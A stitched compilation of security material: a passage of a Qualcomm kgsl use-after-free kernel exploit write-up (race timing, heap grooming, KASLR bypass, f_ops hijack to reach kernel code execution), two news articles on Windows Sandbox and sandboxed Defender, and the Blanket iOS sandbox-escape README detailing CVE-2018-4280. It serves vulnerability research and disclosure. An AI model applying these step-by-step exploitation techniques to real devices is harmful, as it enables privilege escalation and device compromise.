While source code could be misleading as auto function inlining is common in kernel code (in fact ion_sgl_sync_mapped is inlined), the bottom line is that, at some point, the value of sgl will be cached in registry and the state of the original sg_table will not affect the code path anymore. So if I am able to first replace a->table with another sg_table, then deleting this new sg_table using sg_free_table will also cause the sgl to be deleted, but of course, there will be clean up logic that sets sgl to NULL. But what if I set up another thread to delete this new sg_table after sgl had already been cached in the registry? Then it won’t matter if sgl is set to NULL, because the value in the registry will still be pointing to the original scatterlist, and as this scatterlist is now free’d, this means I will now get a use-after-free of sgl directly in ion_sgl_sync_mapped. I can then use the sendmsg to replace it with controlled data. There is one major problem with this though, as the time between sgl being cached in registry and the time where it is used again is very short, it is normally not possible to fit the entire sg_table replacement sequence within such a short time frame, even if I race the slowest cpu core against the fastest.

To resolve this, I’ll use a technique by Jann Horn in Exploiting race conditions on [ancient] Linux, which turns out to still work like a charm on modern Android.

To ensure that each task(thread or process) has a fair share of the cpu time, the linux kernel scheduler can interrupt a running task and put it on hold, so that another task can be run. This kind of interruption and stopping of a task is called preemption (where the interrupted task is preempted). A task can also put itself on hold to allow other task to run, such as when it is waiting for some I/O input, or when it calls sched_yield(). In this case, we say that the task is voluntarily preempted. Preemption can happen inside syscalls such as ioctl calls as well, and on Android, tasks can be preempted except in some critical regions (e.g. holding a spinlock). This means that a thread running the DMA_BUF_IOCTL_SYNC ioctl call can be interrupted after the sgl field is cached in the registry and be put on hold. The default behavior, however, will not normally give us much control over when the preemption happens, nor how long the task is put on hold.

To gain better control in both these areas, cpu affinity and task priorities can be used. By default, a task is run with the priority SCHED_NORMAL, but a lower priority SCHED_IDLE, can also be set using the sched_setscheduler call (or pthread_setschedparam for threads). Furthermore, it can also be pinned to a cpu with sched_setaffinity, which would only allow it to run on a specific cpu. By pinning two tasks, one with SCHED_NORMAL priority and the other with SCHED_IDLE priority to the same cpu, it is possible to control the timing of the preemption as follows.

  1. First have the SCHED_NORMAL task perform a syscall that would cause it to pause and wait. For example, it can read from a pipe with no data coming in from the other end, then it would wait for more data and voluntarily preempt itself, so that the SCHED_IDLE task can run;
  2. As the SCHED_IDLE task is running, send some data to the pipe that the SCHED_NORMAL task had been waiting on. This will wake up the SCHED_NORMAL task and cause it to preempt the SCHED_IDLE task, and because of the task priority, the SCHED_IDLE task will be preempted and put on hold.
  3. The SCHED_NORMAL task can then run a busy loop to keep the SCHED_IDLE task from waking up.

In our case, the object replacement sequence goes as follows:

  1. Obtain a free’d sg_table in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.
  2. First replace this free’d sg_table with another one that I can free easily, for example, making another call to IOCTL_KGSL_GPUOBJ_IMPORT will give me a handle to a kgsl_mem_entry object, which allocates and owns a sg_table. Making this call immediately after step one will ensure that the newly created sg_table replaces the one that was free’d in step one. To free this new sg_table, I can call IOCTL_KGSL_GPUMEM_FREE_ID with the handle of the kgsl_mem_entry, which will free the kgsl_mem_entry and in turn frees the sg_table. In practice, a little bit more heap manipulation is needed as IOCTL_KGSL_GPUOBJ_IMPORT will allocate another object of similar size before allocating a sg_table.
  3. Set up a SCHED_NORMAL task on, say, cpu_1 that is listening to an empty pipe.
  4. Set up a SCHED_IDLE task on the same cpu and have it wait until I signal it to run DMA_BUF_IOCTL_SYNC on the DMA buffer that contains the sg_table in step two.
  5. The main task signals the SCHED_IDLE task to run DMA_BUF_IOCTL_SYNC.
  6. The main task waits a suitable amount of time until sgl is cached in registry, then send data to the pipe that the SCHED_NORMAL task is waiting on.
  7. Once it receives data, the SCHED_NORMAL task goes into a busy loop to keep the DMA_BUF_IOCTL_SYNC task from continuing.
  8. The main task then calls IOCTL_KGSL_GPUMEM_FREE_ID to free up the sg_table, which will also free the object pointed to by sgl that is now cached in the registry. The main task then replaces this object by controlled data using sendmsg heap spraying. This gives control of both dma_address and dma_length in sgl, which are used as arguments to memcpy.
  9. The main task signals the SCHED_NORMAL task on cpu_1 to stop so that the DMA_BUF_IOCTL_SYNC task can resume.

The following figure illustrates what happens in an ideal world.

figure

The following figure illustrates what happens in the real world.

figure

Crazy as it seems, the race can actually be won almost every time, and the same parameters that control the timing would even work on both the Galaxy A71 and Pixel 4. Even when the race failed, it does not result in a crash. It can, however, crash, if the SCHED_IDLE task resumes too quickly. For some reason, I only managed to hold that task for about 10-20ms, and sometimes this is not long enough for the object replacement to complete.

The ion heap

Now that I’m able to replace the scatterlist with controlled data and make use of the read/write primitives in the section Allocating a SWIOTLB, it is time to think about what data I can place behind the DMA buffers.

To allocate DMA buffers, I need to use the ion allocator, which will allocate from the ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that would allocate buffers with addresses greater than 32 bit. The locations of various ion heap can be seen from the kernel log during a boot, the following is from Galaxy A71:

[    0.626370] ION heap system created
[    0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[    0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[    0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[    0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[    0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[    0.631655] ION heap secure_carveout created
[    0.631669] ION heap secure_heap created
[    0.634265] cleancache enabled for rbin cleancache
[    0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000

As we can see, some ion heap are created at fixed locations with fixed sizes. The addresses of these heaps are also smaller than 32 bits. However, there are other ion heaps, such as the system heap, that does not have a fixed address. These are the heaps that have addresses higher than 32 bits. For the exploit, I’ll use the system heap.

DMA buffers allocated on the system heap is allocated via the ion_system_heap_allocate function call. It’ll first try to allocate a buffer from a preallocated memory pool. If the pool is full, then it’ll allocate more pages using alloc_pages:

static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
{
	struct page *page = alloc_pages(pool->gfp_mask, pool->order);
    ...
	return page;
}

and recycle the pages back to the pool after the buffer is freed.

This later case is more interesting because if the memory is allocated from the initial pool, then any out-of-bounds read/write are likely to just be reading and writing other ion buffers, which is only going to be user space data. So let’s take a look at alloc_pages.

The function alloc_pages allocates memory with page granularity using the buddy allocator. When using alloc_pages, the second parameter order specifies the size of the requested memory and the allocator will return a memory block consisting of 2^order contiguous pages. In order to exploit overflow of memory allocated by the buddy allocator, (a DMA buffer from the system heap), I’ll use the results from Exploiting the Linux kernel via packet sockets by Andrey Konovalov. The key point is that, while objects allocated from kmalloc and co. (i.e. kmallockzalloc and kcalloc) are allocated via the slab allocator, which uses preallocated memory blocks (slabs) to allocate small objects, when the slabs run out, the slab allocator will use the buddy allocator to allocate a new slab. The output of proc/slabinfo gives an indication of the size of slabs in pages.

kmalloc-8192        1036   1036   8192    4    8 : tunables    0    0    0 : slabdata    262    262      0
...
kmalloc-128       378675 384000    128   32    1 : tunables    0    0    0 : slabdata  12000  12000      0

In the above, the 5th column indicates the size of the slabs in pages. So for example, if the size 8192 bucket runs out, the slab allocator will ask the buddy allocator for a memory block of 8 pages, which is order 3 (2^3=8), to use as a new slab. So by exhausting the slab, I can cause a new slab to be allocated in the same region as the ion system heap, which could allow me to over read/write kernel objects allocated via kmalloc and co.

Manipulating the buddy allocator heap

As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and use it to allocate memory of the appropriate order. When a certain order (n) runs out of memory, it’ll try to look for free blocks in the next order up, split it in half and add it to the freelist in the requested order. If the next order is also full, it’ll try to find space in the next higher up order, and so on. So by keep allocating pages of order 2^n, eventually the freelist will be exhausted and larger blocks will be broken up, which means that consecutive allocations will be adjacent to each other.

In fact, after some experimentation on Pixel 4, it seems that after allocating a certain amount of DMA buffers from the ion system heap, the allocation will follow a very predicatble pattern.

  1. The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
  2. Within each block, a new allocations will be adjacent to the previous one, with a higher address.
  3. When a 4MB block is filled, allocations will start in the beginning of the next block, which is right below the current 4MB block.

The following figure illustrates this pattern.

figure

So by simply creating a large amount of DMA buffers in the ion system heap, the likelihood would be that the last allocated buffer will be allocated in front of a «hole» of free memory, and the next allocation from the buddy allocator is likely to be inside this hole, provided the requested number of pages fits in this hole.

The heap spraying strategy is then very simple. First allocate a sufficient amount of DMA buffers in the ion heap to cause larger blocks to break up, then allocate a large amount of objects using kmalloc and co. to cause a new slab to be created. This new slab is then likely to fall into the hole behind the last allocated DMA buffer. Using the use-after-free to overflow this buffer then allows me to gain arbitrary read/write of the newly created slab.

Defeating KASLR and leaking address to DMA buffer

Initially, I was experimenting with the binder_open call, as it is easy to reach (just do open("/dev/binder")) and will allocate a binder_proc struct:

static int binder_open(struct inode *nodp, struct file *filp)
{
    ...
	proc = kzalloc(sizeof(*proc), GFP_KERNEL);
	if (proc == NULL)

which is of size 560 and will persist until the /dev/binder file is closed. So it should be relatively easy to exhaust the kmalloc-1024 slab with this. However, after dumping the results of the out-of-bounds read, I noticed that a recurring memory pattern:

00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff  h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000  ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000  ................
...

The 08af 5109 80ff ffff in the second part of the first line looks like an address that corresponds to kernel code. Indeed, it is the address of binder_fops:

# echo 0 > /proc/sys/kernel/kptr_restrict                                                                                                                                                
# cat /proc/kallsyms | grep ffffff800951af08                                                                                                                                                 
ffffff800951af08 r binder_fops

So looks like these are file struct of the binder files that I opened and what I’m seeing here is the field f_ops that points to the binder_fops. Moreover, the 32 bytes after f_ops are the same for every file struct of the same type, which offers a pattern to identify these files. So by reading the memory behind the DMA buffer and looking for this pattern, I can locate the file structs that belong to the binder devices that I opened.

Moreover, the file struct contains a mutex f_pos_lock, which contains a field wait_list:

struct mutex {
	atomic_long_t		owner;
	spinlock_t		wait_lock;
    ...
	struct list_head	wait_list;
...
};

which is a standard doubly linked list in linux:

struct list_head {
	struct list_head *next, *prev;
};

When wait_list is initialized, the head of the list will just be a pointer to itself, which means that by reading the next or prev pointer of the wait_list, I can obtain the address of the file struct itself. This will then allow me to work out the address of the DMA buffer which I can control because the offset between the file struct and the buffer is known. (By looking at its offset in the data that I dumped, in this example, the offset is 0x11020).

By using the address of binder_fops, it is easy to work out the KASLR slide and defeat KASLR, and by knowing the address of a controlled DMA buffer, I can use it to store a fake file_operations («vtable» of file struct) and overwrite f_ops of my file struct to point to it. The path to arbitrary code execution is now clear.

  1. Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
  2. Search for binder file structs within the memory using the predictable pattern and get the offset of the file struct.
  3. Use the identified file struct to obtain the address of binder_fops and the address of the file struct itself from the wait_list field.
  4. Use the binder_fops address to work out the KASLR slide and use the address of the file struct, together with the offset identified in step two to work out the address of the DMA buffer.
  5. Use the out-of-bounds write primitive gained from the use-after-free to overwrite the f_ops pointer to the file that corresponds to this file struct (which I owned), so that it now points to a fake file_operation struct stored in my DMA buffer. Using file operations on this file will then execute functions of my choice.

Since there is nothing special about binder files, in the actual exploit, I used /dev/null instead of /dev/binder, but the idea is the same. I’ll now explain how to do the last step in the above to gain arbitrary kernel code execution.

Getting arbitrary kernel code execution

To complete the exploit, I’ll use «the ultimate ROP gadget» that was used in An iOS hacker tries Android of Brandon Azad (and I in fact stole a large chunk of code from his exploit). As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)

to invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This would allow us to perform arbitrary memory load/store and call arbitrary kernel functions with up to five arguments and a 64 bit return value.

There is, however one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called the Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example, Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.

For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Byapsses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.

Without going into much details about RKP, the two parts that are relevant to our situation are:

  1. RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
  2. RKP protects important data structure such as the credentials of a process so they are effectively read only.

Point one means that even though I can hijack the f_ops pointer of my file struct, I cannot jump to an arbitrary location. However, it is still possible to jump to the start of any function. The practical implication is that while I can control the function that I call, I may not be able to control call arguments. Point two means that the usual shortcut of overwriting credentials of my own process to that of a root process would not work. There are other post-exploitation techniques that can be used to overcome this, which I’ll briefly explain later, but for the exploit of this post, I’ll just stop short at arbitrary kernel code execution.

In our situation, point one is actually not a big obstacle. The fact that I am able to hijack the file_operations, which contains a whole array of possible calls that are thin wrappers of various syscalls means that it is likely to find a file operation with a 64 bit second argument which I can control by making the appropriate syscall. In fact, I don’t even need to look that far. The first operation, llseek fits the bill:

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
    ...

This function takes a 64 bit integer, loff_t as the second argument and can be invoked by calling the lseek64 syscall:

off_t lseek64(int fd, off_t offset, int whence);

where offset translates directly into loff_t in llseek. So by overwriting the f_ops pointer of my file to have its llseek field point to __bpf_prog_run32, I can invoke any eBPF program of my choice any time I call lseek64, without even the need to trigger the bug again. This gives me arbitrary kernel memory read/write and code execution.

As explained before, because of RKP, it is not possible to simply overwrite process credentials to become root even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all the userspace data and processes are essentially under control and there are many ways to gain control over privileged user processes, such as those with system privilege to effectively gain system privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another concrete technique mentioned in Galaxy’s Meltdown — Exploiting SVE-2020-18610 is to overwrite the kernel stack of privileged processes to gain arbitrary kernel code execution as a privileged process. In short, there are many post exploitation techniques available at this stage to effectively root the phone.

Conclusion

In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was a result of a mismatch between the user supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean up logic being applied when an error happens. In this case, two common software errors, the ambiguity in the role of a type, and incorrect handling of errors, played together to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.

While great progress has been made in sandboxing the userspace services in Android, the kernel, in particular vendor drivers, remain a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to gain the full power of the kernel, which often result in a much shorter exploit bug chain.

The full exploit can be found here with some set up notes.

Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.

Microsoft unveils Windows Sandbox: Run any app in a disposable virtual machine

( Original text by PETER BRIGHT )

A few months ago, Microsoft let slip a forthcoming Windows 10 feature that was, at the time, called InPrivate Desktop: a lightweight virtual machine for running untrusted applications in an isolated environment. That feature has now been officially announced with a new name, Windows Sandbox.

Windows 10 already uses virtual machines to increase isolation between certain components and protect the operating system. These VMs have been used in a few different ways. Since its initial release, for example, suitably configured systems have used a small virtual machine running alongside the main operating system to host portions of LSASS. LSASS is a critical Windows subsystem that, among other things, knows various secrets, such as password hashes, encryption keys, and Kerberos tickets. Here, the VM is used to protect LSASS from hacking tools such that even if the base operating system is compromised, these critical secrets might be kept safe.Ars Technica

In the other direction, Microsoft added the ability to run Edge tabs within a virtual machine to reduce the risk of compromise when visiting a hostile website. The goal here is the opposite of the LSASS virtual machine—it’s designed to stop anything nasty from breaking out of the virtual machine and contaminating the main operating system, rather than preventing an already contaminated main operating system from breaking into the virtual machine.

Windows Sandbox is similar to the Edge virtual machine but designed for arbitrary applications. Running software in a virtual machine and then integrating that software into the main operating system is not new—VMware has done this on Windows for two decades now—but Windows Sandbox is using a number of techniques to reduce the overhead of the virtual machine while also maximizing the performance of software running within the VM, without compromising the isolation it offers.

The sandbox depends on operating system files residing in the host.
Enlarge / The sandbox depends on operating system files residing in the host.Microsoft

Traditional virtual machines have their own operating system installation stored on a virtual disk image, and that operating system must be updated and maintained separately from the host operating system. The disk image used by Windows Sandbox, by contrast, shares the majority of its files with the host operating system; it contains a small amount of mutable data, the rest being immutable references to host OS files. This means that it’s always running the same version of Windows as the host and that, as the host is updated and patched, the sandbox OS is likewise updated and patched.

Sharing is used for memory, too; operating system executables and libraries loaded within the VM use the same physical memory as those same executables and libraries loaded into the host OS.

That sharing of the host's operating system files even occurs when the files are loaded into memory.
Enlarge / That sharing of the host’s operating system files even occurs when the files are loaded into memory.Microsoft

Standard virtual machines running a complete operating system include their own process scheduler that carves up processor time between all the running threads and processes. For regular VMs, this scheduler is opaque; the host just knows that the guest OS is running, and it has no insight into the processors and threads within that guest. The sandbox virtual machine is different; its processes and threads are directly exposed to the host OS’ scheduler, and they are scheduled just like any other threads on the machine. This means that if the sandbox has a low priority thread, it can be displaced by a higher priority thread from the host. The result is that the host is generally more responsive, and the sandbox behaves like a regular application, not a black-box virtual machine.

On top of this, video cards with WDDM 2.5 drivers can offer hardware-accelerated graphics to software running within the sandbox. With older drivers, the sandbox will run with the kind of software-emulated graphics that are typical of virtual machines.

Taken together, Windows Sandbox combines elements of virtual machines and containers. The security boundary between the sandbox and the host operating system is a hardware-enforced boundary, as is the case with virtual machines, and the sandbox has virtualized hardware much like a VM. At the same time, other aspects—such as sharing executables both on-disk and in-memory with the host as well as running an identical operating system version as the host—use technology from Windows Containers.

At least for now, the Sandbox appears to be entirely ephemeral. It gets destroyed and reset whenever it’s closed, so no changes can persist between runs. The Edge virtual machines worked similarly in their first incarnation; in subsequent releases, Microsoft added support for transferring files from the virtual machine to the host so that they could be stored persistently. We’d expect a similar kind of evolution for the Sandbox.

Windows Sandbox will be available in Insider builds of Windows 10 Pro and Enterprise starting with build 18305. At the time of writing, that build hasn’t shipped to insiders, but we expect it to be coming soon.

Microsoft Sandboxes Windows Defender

As the infosec community talked about potential cyber attacks leveraging vulnerabilities in antivirus products, Microsoft took notes and started to work on a solution. The company announced that its Windows Defender can run in a sandbox.

Antivirus software runs with the highest privileges on the operating system, a level of access coveted by any threat actor, so any exploitable vulnerabilities in these products add to the possibilities of taking over the system.

By making Windows Defender run in a sandbox, Microsoft makes sure that the security holes its product may have stay contained within the isolated environment; unless the attacker finds a way to escape the sandbox, which is among the toughest things to do, the system remains safe.

Remote code execution flaws

Windows Defender has seen its share of vulnerability reports. Last year, Google’s experts Natalie Silvanovich and Tavis Ormandy announced a remote code execution (RCE) bug severe enough to make Microsoft release an out-of-band update to fix the problem.

In April this year, Microsoft patched another RCE in Windows Defender, which could be abused via a specially crafted RAR file. When the antivirus got to scanning it, as part of its protection routine, the would trigger, giving the attacker control over the system in the context of the local user.

Microsoft is not aware of any attacks in-the-wild actively targeting or exploiting its antivirus solution but acknowledges the potential risk hence its effort to sandbox Windows Defender.

Turn on sandboxing for Windows Defender

The new capability has been gradually rolling out for Windows Insider users for test runs, but it can also be enabled on Windows 10 starting version 1703.

Regular users can also run Windows Defender in a sandbox if they have the operating system version mentioned above. They can do this by enabling  the following system-wide setting from the Command Prompt with admin privileges:

setx /M MP_FORCE_USE_SANDBOX 1

Restarting the computer is necessary for the setting to take effect. Reverting the setting is possible by changing the value for forcing sandboxing to 0 (zero) and rebooting the system.

Sandboxing Windows Defender

Forcing an antivirus product to work from an insulated context is no easy thing to do due to the app’s need to check a large number of inputs in real time, so access to these resources is an absolute requirement. An impact on performance is a likely effect of this.

«It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing,» the official announcement reads.

Despite the complexity of the task, Microsoft was not the first to sandbox Windows Defender. Last year, experts from security outfit Trail of Bits, who also specialize in virtualization, created a framework that could run Windows applications in their own containers. Windows Defender was one of the projects that Trail of Bits was able to containerize successfully and open-sourced it.

AVs are as susceptible to flaws as other software

Despite their role on the operating system, security products are susceptible to flaws just like other complex software. Windows Defender is definitely not the only one vulnerable.

In 2008, security researcher Feng Xue talked at BlackHat Europe about techniques for finding and exploiting vulnerabilities in antivirus software, referencing bugs as old as 2004.

Xue pointed out that the flaws in this type of software stem from the fact that it has to deal with hundreds of files types that need to be checked with components called content parsers. A bug in one parser could represent a potential path on the protected system.

Six years later, another researcher, Joxean Koret, took the matter further and showed just how vulnerable are the defenders of the computer systems, and let the world know that exploiting them «is not different to exploiting other client-side applications.»

His analysis at the time on 14 antivirus solutions on the market revealed dozens of vulnerabilities that could be exploited remotely and locally, including denial of service, privilege escalation, and arbitrary code execution. His list included big names like Bitdefender and Kaspersky.

Antivirus developers do not leave their customers high and dry and audit their products constantly. The result is patching any of the bugs discovered during the code review and improving the quality assurance process for finer combing for potential flaws.

Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allowentitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a «malicious» exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied bytask_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORTspecial port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the «task» field. An equivalent API, thread_set_special_port, can be used to set a custom port in the «thread» field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a «malicious» exception message containing a Mach service port in place of the task and thread port. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASHexceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abortfunction.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASHexception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port:

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

